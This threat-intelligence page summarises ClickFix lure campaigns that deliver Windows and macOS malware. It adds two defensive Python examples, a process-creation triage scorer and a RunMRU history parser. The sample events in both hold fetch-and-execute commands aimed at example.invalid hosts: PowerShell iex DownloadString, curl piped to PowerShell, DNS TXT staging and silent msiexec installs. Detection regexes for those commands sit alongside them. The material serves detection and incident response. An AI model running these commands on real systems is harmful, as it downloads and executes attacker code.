Mallory

ClickFix Social-Engineering Lures Deliver Multi-Stage Windows Malware via Browser Extensions and Compromised WordPress Sites

clickfix, fake browser alert, clipboard hijacking, browser extension, social engineering, wordpress, website compromise, javascript injection, cloudflare captcha, credential theft, windows, loader, human verification, powershell, financial theft
Updated March 10, 2026 at 04:07 PM (2 sources)

Threat researchers reported continued evolution and operationalization of ClickFix-style social engineering, where victims are tricked into manually executing attacker-supplied commands via the Windows Run dialog. Huntress described a new variant dubbed CrashFix, attributed to KongTuke, which uses a malicious browser extension to display a fake “browser stopped abnormally” security warning and a bogus “scan” flow; the extension silently places a PowerShell command on the clipboard, disguised as a legitimate repair action, and instructs the user to paste-and-run it, leading to code execution.

Rapid7 Labs separately documented a large-scale campaign in which an unidentified actor compromises legitimate WordPress sites to inject a ClickFix implant that impersonates a Cloudflare human verification (CAPTCHA) challenge. The operation spans 250+ compromised sites across 12+ countries and delivers a multi-stage, mostly in-memory malware chain (obfuscated JavaScript → PowerShell stagers → in-memory loaders/shellcode) aimed at stealing credentials and digital wallets from Windows systems, enabling downstream financial theft and potential follow-on intrusion using the harvested credentials.
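
Both reports above end the same way: a command the victim pasted into the Run dialog is executed by a shell that explorer.exe launched. The triage rule set below is an added example for this page, not tooling from Huntress, Rapid7 or any other vendor named here. It scores constructed, Sysmon-style process-creation records (parent image, image, command line) for that combination: an explorer.exe parent (what a Win+R paste-and-run looks like), hidden-window PowerShell, in-memory invocation, fetch-and-pipe one-liners such as `cmd /c curl ... | powershell`, plus the DNS TXT staging and silent `msiexec` install variants described in the related stories further down. The rule names, weights, alert threshold, sample events and `example.invalid` hosts are assumptions made for the example.

```python
"""ClickFix process-chain triage over Sysmon-style process-creation records.

Added example for this page, not tooling from any vendor named in it.  Rule names,
weights, the alert threshold and the sample events below are assumptions.
"""
import re
from dataclasses import dataclass, field


@dataclass
class ProcEvent:
    parent_image: str   # Sysmon ParentImage / 4688 Creator Process Name
    image: str          # Sysmon Image / 4688 New Process Name
    command_line: str   # Sysmon CommandLine / 4688 Process Command Line


@dataclass
class Finding:
    rules: list = field(default_factory=list)
    score: int = 0


# Interpreters and installers a pasted ClickFix command typically lands in.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "msiexec.exe"}

# (rule name, regex over the command line, weight).  Weights are assumed values.
RULES = [
    # window-hiding / policy-bypass switches a user would not type by hand
    ("hidden_window", re.compile(r"-(?:w|win|windowstyle)\s*hidden|-nop\b|-noni\b|-ep\s*bypass", re.I), 2),
    # download-and-evaluate without touching disk (the in-memory stagers in the reports)
    ("inmemory_exec", re.compile(r"\biex\b|invoke-expression|downloadstring|frombase64string", re.I), 3),
    # fetch remote content and pipe it straight into PowerShell
    ("fetch_pipe", re.compile(r"\b(?:curl|wget|bitsadmin)\b.*\|\s*powershell", re.I), 4),
    # next stage pulled from a DNS TXT record instead of over HTTP
    ("dns_txt_staging", re.compile(r"nslookup.*-(?:type|q(?:uerytype)?)=txt|resolve-dnsname.*-type\s+txt", re.I), 4),
    # silent MSI install straight from a URL
    ("silent_msi_url", re.compile(r"msiexec.*(?:/|-)i\s+https?://\S+.*(?:/|-)q", re.I), 3),
    # decoy comment appended so the pasted text reads like a verification step
    # (wording varies between campaigns; the keyword list is an assumption)
    ("verification_decoy", re.compile(r"#.*(?:verif|captcha|human|robot)", re.I), 2),
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent) -> Finding:
    """Score one process-creation record; 0 means nothing ClickFix-like was seen."""
    f = Finding()
    if _basename(ev.image) not in SHELLS:
        return f
    # Win+R hands the typed command to the shell, so the parent is explorer.exe.
    # Alone this is normal user activity; it only matters combined with the rules below.
    if _basename(ev.parent_image) == "explorer.exe":
        f.rules.append("explorer_parent")
        f.score += 3
    for name, rx, weight in RULES:
        if rx.search(ev.command_line):
            f.rules.append(name)
            f.score += weight
    return f


# Constructed sample telemetry (not real logs).  Events 1-4 mirror the chains described
# in the reports; events 5 and 6 are benign and must stay below the threshold.
SAMPLE_EVENTS = [
    ProcEvent("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              "powershell -w hidden -nop -c \"iex (New-Object Net.WebClient).DownloadString('https://example.invalid/verify.ps1')\""
              " # \"I am not a robot - reCAPTCHA Verification ID: 7412\""),
    ProcEvent("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\cmd.exe",
              "cmd /c curl -s https://example.invalid/fix.txt | powershell"),
    ProcEvent("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              "powershell -w hidden -c \"$t=(Resolve-DnsName -Name stage.example.invalid -Type TXT).Strings; iex $t\""),
    ProcEvent("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\msiexec.exe",
              "msiexec /i https://example.invalid/update.msi /qn"),
    ProcEvent("C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              "powershell -ExecutionPolicy Bypass -File C:\\ProgramData\\Scripts\\inventory.ps1"),
    ProcEvent("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\cmd.exe", "cmd /c dir"),
]


def hunt(events=SAMPLE_EVENTS, threshold=5):
    """Return [(image basename, matched rules, score)] for events at or above threshold."""
    hits = []
    for ev in events:
        f = score_event(ev)
        if f.score >= threshold:
            hits.append((_basename(ev.image), f.rules, f.score))
    return hits


if __name__ == "__main__":
    for image, rules, score in hunt():
        print(f"{score:>2}  {image:<15} {', '.join(rules)}")
```

The explorer.exe parent alone scores below the threshold (`cmd /c dir` from Run is ordinary), and a scheduled script under svchost.exe scores nothing; it is the pairing of the Run-dialog parent with download-and-evaluate switches that separates a lure from daily use. In production the same rules belong on the raw 4688/Sysmon 1 stream, with the threshold tuned against the admin scripts that legitimately use `-ExecutionPolicy Bypass`.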

Related Stories

ClickFix Social-Engineering Campaigns Using Compromised WordPress Sites and DNS-Based Staging

Threat actors are scaling **ClickFix**-style “self-infection” attacks that abuse compromised legitimate websites to trick users into manually executing malicious PowerShell via the Windows Run dialog or a terminal. Reporting describes the **KongTuke** campaign evolving its tradecraft by retrieving next-stage instructions from **DNS TXT records** rather than over HTTP, reducing visibility for controls focused on web traffic and blending activity into normal DNS resolution. The objective is follow-on malware deployment and persistence, including installation of remote-access tooling such as the **Interlock RAT**. Separately, researchers described a large **watering-hole** operation dubbed **IClickFix** that poisoned **3,800+ WordPress sites** with a fake *Cloudflare Turnstile CAPTCHA* prompt that instructs visitors to copy/paste and run a “fix” command. Once executed, the staged PowerShell pulls commodity payloads including **NetSupport RAT**, **Emmenhtal Loader**, and **XFiles Stealer**, and uses tracking/targeting logic (e.g., an `ic-tracker-js` HTML tag) to manage victim flow. In contrast, a different WordPress compromise technique called **“directory shadowing”** was reported as an SEO-spam operation that creates physical folders matching WordPress permalinks and serves gambling content selectively to crawlers (via User-Agent checks), which is not part of the ClickFix execution chain.

1 month ago
ClickFix Social Engineering Drives Multi-Platform Malware Delivery

Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.

3 weeks ago
ClickFix Social-Engineering Campaigns Using Fake CAPTCHA and Fake Installer Pages

Security researchers reported multiple **ClickFix** campaigns that compromise endpoints by tricking users into manually executing attacker-provided commands rather than exploiting a software vulnerability. CERT Polska documented an incident response at a large Polish organization where a **fake CAPTCHA** prompt led a user to run a malicious snippet via *Win+R*, resulting in malware execution and suspected **DLL side-loading** from `%APPDATA%\Intel` (legitimate `igfxSDK.exe`/`version.dll` alongside a suspicious `wtsapi32.dll`). Investigators also identified additional suspicious DLLs in the user’s local AppData and recovered an execution trail consistent with a one-liner that fetched remote content and piped it into PowerShell (e.g., `cmd /c curl ... | powershell`). Separately, threat hunting research described a macOS-focused ClickFix operation using **typosquatted Homebrew** lookalike sites to present a “copy/paste” install command that runs in Terminal. The first-stage script repeatedly prompted for a password and validated it using `dscl authonly` to harvest working credentials before deploying a second-stage infostealer dubbed **Cuckoo Stealer**, which was reported to establish **LaunchAgent** persistence, remove quarantine attributes, and communicate over encrypted HTTPS C2 while targeting browser credentials/session tokens, Keychain data, notes/messaging artifacts, VPN/FTP configs, and cryptocurrency wallets. Both reports highlight ClickFix as an increasingly common, opportunistic initial access technique that scales by abusing trusted user workflows on Windows and macOS.

4 weeks ago
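
The Run dialog keeps its own history in the registry, which is how the execution trail in the CERT Polska case above can be recovered after the fact. The parser below is an added example for this page, not code from CERT Polska or any vendor mentioned here. It reads a constructed `.reg` export of `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, orders the entries most-recent-first using the `MRUList` value, strips the trailing `\1` marker Windows appends to each stored command, and flags the entries that invoke an interpreter or reference a URL. The sample entries and `example.invalid` hosts are constructed; the key path and the `\1` suffix are real Windows behaviour.

```python
"""Reconstruct Win+R history from a RunMRU registry export and flag ClickFix-style entries.

Added example for this page (not CERT Polska's or any vendor's tooling).  The .reg text
below is constructed; the key path and the trailing '\\1' marker are real Windows behaviour.
"""
import re

RUNMRU_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# One exported REG_SZ value per line: "name"="data"  (regedit escapes backslash and quote)
_VALUE_RX = re.compile(r'^"([^"]+)"="(.*)"\s*$')

# Things a user rarely types into Run by hand but a pasted lure usually contains.
_SUSPECT_RX = re.compile(
    r"\b(?:powershell|pwsh|cmd|mshta|msiexec|curl|bitsadmin)\b|https?://|\biex\b", re.I)

# Constructed export.  MRUList lists value names most-recent-first.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"MRUList"="dbca"
"a"="notepad\\1"
"b"="powershell -w hidden -c \"iex (New-Object Net.WebClient).DownloadString('https://example.invalid/verify')\"\\1"
"c"="calc\\1"
"d"="cmd /c curl -s https://example.invalid/fix.txt | powershell\\1"
'''


def _unescape(data: str) -> str:
    """Undo regedit's escaping of backslash and double quote, left to right."""
    out, i = [], 0
    while i < len(data):
        if data[i] == "\\" and i + 1 < len(data) and data[i + 1] in '\\"':
            out.append(data[i + 1])
            i += 2
        else:
            out.append(data[i])
            i += 1
    return "".join(out)


def parse_reg_export(text: str) -> dict:
    """Return {value name: data} for the RunMRU key only; other keys are ignored."""
    values, in_key = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            in_key = line[1:-1].lower() == RUNMRU_KEY.lower()
            continue
        if in_key:
            m = _VALUE_RX.match(line)
            if m:
                values[m.group(1)] = _unescape(m.group(2))
    return values


def run_history(values: dict) -> list:
    """Commands in MRUList order (most recent first) with the '\\1' marker removed."""
    history = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is None:          # MRUList can name a value that has since been deleted
            continue
        history.append(raw[:-2] if raw.endswith("\\1") else raw)
    return history


def suspicious_runs(values: dict) -> list:
    """Subset of the history worth pulling into the incident timeline."""
    return [cmd for cmd in run_history(values) if _SUSPECT_RX.search(cmd)]


if __name__ == "__main__":
    vals = parse_reg_export(SAMPLE_REG)
    for cmd in run_history(vals):
        print("!!" if _SUSPECT_RX.search(cmd) else "  ", cmd)
```

RunMRU has no timestamps of its own; the ordering comes from `MRUList`, and the key's last-write time (from the hive, not the `.reg` export) bounds when the most recent entry was run. Pair the flagged command with the matching process-creation event and the Prefetch entry for the interpreter to anchor it in the timeline.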

Get Ahead of Threats Like This

Mallory continuously monitors global threat intelligence and correlates it with your attack surface. Know if you're exposed — before adversaries strike.